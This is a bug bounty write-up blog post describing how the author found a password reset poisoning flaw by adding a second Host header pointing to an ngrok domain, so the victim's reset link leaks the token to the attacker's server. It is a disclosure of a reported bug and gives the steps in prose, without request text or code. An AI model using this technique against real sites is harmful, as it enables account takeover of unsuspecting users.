Password Reset Poisoning leading to Account Takeover
As mentioned in my previous blog here is my another blog on Account Takeover which is unique from the previous one.
So getting started with it, after achieving my 1st P1 on Bugcrowd which was for IDOR to Account Takeover the next day I got a private program invite with a wildcard domain as assets and I just opened the main domain and looked at the whole web application and its working, the first thing I tried was reset password function that I have done in my previous blog but there was no such workflow for that so I logged off for the day and took a break for some days.
And after 2 days I received and Email saying that the program is being paused for some days. Next as usual I was going for college and while we were discussing about the recent tweets on the bug bounty tips Pratik gave me an idea on Host Header injection bypass, so after college I went back and tried the same on the private program and luckily it executed as expected. This Vulnerability was marked as P2 by Bugcrowd since it required one click user interaction.
Comming to the Proof of Concept:- For this attack I used Burpsuite and Ngrok.
First I tried requesting the reset password for the victim account and captured the same request in the Burp and edited the request before Forwarding it. And in the same request I added another Host Header with the Ngrok url in the request below the original Host.
So after sending the edited POST Request the Victim will receive a reset password link which will have ngrok domain in the URL(attacker controlled domain).
And as soon as the Victim visits the link received the Reset token will be leaked on the attacker controlled server.
As you can see in the above image the the Victim’s Password reset Token is Leaked on the attacker controlled server which now he will use it to change the Password and thus Takeover the whole Account of the victim.
Stay updated with me on Twitter
Hope you may have liked it!
Thank you for reading.
